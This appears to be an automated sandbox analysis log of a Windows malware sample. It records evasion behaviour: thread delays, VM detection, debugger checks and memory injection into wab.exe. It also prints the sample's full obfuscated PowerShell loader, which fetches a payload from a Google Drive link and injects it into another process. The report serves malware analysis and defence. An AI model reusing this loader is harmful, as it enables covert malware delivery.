            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598935Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597686Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597577Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597356Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596120Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595768Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595526Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595157Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595041Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594655Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594105Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 593976Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4566Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5244Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7223Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2620Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4211Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5578Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 4824Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 7223 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 2620 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 820Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -21213755684765971s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5268Thread sleep count: 4211 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5268Thread sleep count: 5578 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599282s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599157s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -599046s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598935s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598828s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598719s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598485s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -597686s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -597577s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -597356s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -99891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596120s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -596000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595768s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595641s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595526s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595407s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595282s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595157s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -595041s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594797s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594655s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594438s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -594105s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744Thread sleep time: -593976s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599157Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599046Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598935Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597686Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597577Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597356Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596120Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595768Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595526Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595157Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595041Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594655Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594105Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 593976Jump to behavior
            Source: wscript.exe, 00000001.00000003.1607028862.0000024CD103A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\a
            Source: wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWre
            Source: wscript.exe, 00000001.00000003.1606786959.0000024CD121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
            Source: wscript.exe, 00000001.00000002.1609069446.0000024CD10F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000003.00000002.2273064994.00000250D4409000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_02DF7ED0 CheckRemoteDebuggerPresent,11_2_02DF7ED0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_02DFF568 LdrInitializeThunk,11_2_02DFF568
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4260000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2DFFD38Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BeliJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BeliJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
